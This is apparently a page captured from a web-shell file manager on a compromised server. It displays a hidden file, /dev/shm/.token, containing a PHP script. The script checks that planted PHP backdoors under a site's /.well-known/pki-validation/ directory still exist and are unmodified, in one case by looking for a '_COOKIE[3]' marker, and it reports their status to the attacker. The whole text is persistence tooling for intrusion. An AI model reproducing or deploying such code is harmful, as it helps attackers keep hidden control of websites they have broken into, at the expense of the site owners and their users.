Your IP : 216.73.216.228


Current Path : /proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/dev/shm/
Upload File :
Current File : //proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/dev/shm/.token

<?php   $r = '/home/tokomrjk/theelms.net'; $x = ["/.well-known/pki-validation/testcourselib.php"=>"bd@@250523100@@12",
"/.well-known/pki-validation/False.php"=>"bd@@250518723@@642",
"/.well-known/pki-validation/testcourselib.php"=>"bd@@250483706@@601",
"/.well-known/pki-validation/False.php"=>"bd@@250521803@@_COOKIE[3]"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');